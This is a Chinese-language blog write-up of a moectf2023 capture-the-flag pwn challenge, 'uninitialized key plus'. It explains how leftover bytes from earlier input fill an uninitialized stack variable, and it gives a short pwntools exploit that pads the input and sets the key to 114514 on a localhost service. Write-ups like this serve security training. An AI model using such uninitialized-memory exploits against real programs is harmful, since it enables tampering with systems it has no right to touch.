moectf2023 - uninitialized key plus

RocketDev
  2023-09-23 12:00 2023-09-23 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载uninitialized_key_plus, 保护全开
ghidra分析为64位程序

解题思路

和上次一样,使得栈上变量key==114514即可
使用gdb发送'111122223333444455556666'进行探测(共读入24B), 发现输入无意义字符后key上留下来的值是'6666',故填充前面段,将6666设为114514即可

EXPLOIT

1
2
3
4
5
from pwn import *
sh = remote("localhost", 41675)
sh.sendline(b'0'*20 + p32(114514))
sh.sendline(b'asdfasdf')
sh.interactive()

Done.

  • 标题: moectf2023 - uninitialized key plus
  • 作者: RocketDev
  • 创建于 : 2023-09-23 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/23/uninitialized_key_plus/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - uninitialized key plus
  1. 文件分析
  2. 解题思路
  3. EXPLOIT